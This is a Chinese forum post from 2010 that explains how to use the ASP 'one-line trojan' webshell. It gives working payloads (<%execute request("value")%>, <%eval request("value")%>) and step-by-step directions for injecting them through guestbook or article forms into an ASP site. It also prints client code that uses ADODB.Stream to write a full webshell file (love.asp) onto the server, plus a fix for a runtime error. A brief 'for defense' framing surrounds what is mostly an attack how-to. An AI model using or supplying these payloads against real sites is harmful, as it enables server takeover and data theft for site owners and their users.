首页
Portal
业界资讯
社区
BBS
我的家园
Space
个人空间
导读
Guide
登录
/
注册
用户名
Email
自动登录
找回密码
密码
登录
注册
搜索
搜索
本版
帖子
用户
本版
帖子
用户
帖子
好友
道具
勋章
收藏
任务
淘帖
门户
导读
设置
我的收藏
退出
腾讯QQ
微信登录
首页
›
≡≡网络技术≡≡
›
编程语言
›
ASP一句话木马的使用方法!
返回列表
ASP一句话木马的使用方法!
[ 复制链接 ]
灰儿
2010-9-15 10:39:12
如何使用ASP一句话木马呢?俗话说的好:“害人之心不可有,防人之心不可无!”下面就由惟零广告为大家简单介绍一句话木马的使用方法,让您了解其工作原理,确保您的程序万无一失!
ASP一句话木马
当黑客要测试某个网站是否安全,就有可能在注册信息的电子邮箱或者个人主页等文本框中插入类似如下代码:
<%execute request("value")%>
<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
当黑客知道了您网站的数据库地址,就可以利用本地网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)
这就被称为一句话木马,它是基于B/S结构的。
ASP一句话木马使用方法
首先,找到数据库是asp格式的网站,然后,以留言板或者发表文章的方式,把一句话添加到asp数据库或者加进asp网页。
记住!我们的目的是把一句话<%execute request("value")%>添加到数据库,无论你采用任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后杀进去!这就可以干你想干的事情了!
分析ASP一句话木马的工作原理
首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了。分析Request.form('#')+''这句代码的意思,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,“#”号可以用其他变量表示,例如下面一句话客户端的代码:
<textarea name="#自定义" cols="80" rows="9">
set gxjiaju=server.createObject("Adodb.Stream")
gxjiaju.Open
gxjiaju.Type=2
gxjiaju.CharSet="gb2312"
gxjiaju.writetext request("要写入的代码内容的文本域名称")
gxjiaju.SaveToFile server.mappath("love.asp"),2
gxjiaju.Close
set gxjiaju=nothing
response.redirect "love.asp"
</textarea>
学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#自定义')),然后执行(使用eval--(Request.form('#')+'')),“--”使用时请去掉,我这服务器空间被屏蔽了。这样也就被执行了以下内容:
set gxjiaju=server.createObject("Adodb.Stream")
gxjiaju.Open
gxjiaju.Type=2
gxjiaju.CharSet="gb2312"
gxjiaju.writetext request("要写入的代码内容的文本域名称")
gxjiaju.SaveToFile server.mappath("love.asp"),2
gxjiaju.Close
set gxjiaju=nothing
response.redirect "love.asp"
学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象gxjiaju,然后使用对象中的writetext方法将request("文本框名称")读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们将用到的大马脚本)写入服务端的love.asp文件中,写入结束后使用set gxjiaju=nothing释放对象,然后使用response.redirect "love.asp" 跳转到新生成的love.asp文件,就是我们最后见的大马了!
关于服务器错误
通常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
Source line: execute request("nettoo")
Description: 类型不匹配: 'execute'
这个如何解决呢?
想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!
以上是惟零广告总结的ASP一句话木马使用方法,希望您通过以上方法,来完善您自己网站的安全性,同时请不要忘了“害人之心不可有,防人之心不可无!”。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
回复
本版积分规则
回帖后跳转到最后一页
灰儿
管理员
9832篇
主题总数
7
总热度
提问
+关注
产品动态
2024-05-04
Switch EdiZon SE 金手指插件使用 图文教程
2024-04-29
网御星云入侵防护系统_V6000流量控制配置实例
2024-04-23
电子书在线阅读和下载网址推荐
2024-04-23
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
2024-04-23
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
2024-04-20
《再次成为神》免费下载观看
2024-04-20
《為甚麼會有人類》
2024-04-16
Linux下查询文件夹中文件数量的方法
热点推荐
1
Switch EdiZon SE 金手指插件使用 图文教程
2
网御星云入侵防护系统_V6000流量控制配置实例
3
电子书在线阅读和下载网址推荐
4
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
5
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
6
《再次成为神》免费下载观看
7
《為甚麼會有人類》
8
Linux下查询文件夹中文件数量的方法
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
产品动态
2024-05-04
Switch EdiZon SE 金手指插件使用 图文教程
2024-04-29
网御星云入侵防护系统_V6000流量控制配置实例
2024-04-23
电子书在线阅读和下载网址推荐
2024-04-23
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
2024-04-23
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
2024-04-20
《再次成为神》免费下载观看
2024-04-20
《為甚麼會有人類》
2024-04-16
Linux下查询文件夹中文件数量的方法
热点推荐
1
Switch EdiZon SE 金手指插件使用 图文教程
2
网御星云入侵防护系统_V6000流量控制配置实例
3
电子书在线阅读和下载网址推荐
4
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
5
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
6
《再次成为神》免费下载观看
7
《為甚麼會有人類》
8
Linux下查询文件夹中文件数量的方法
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。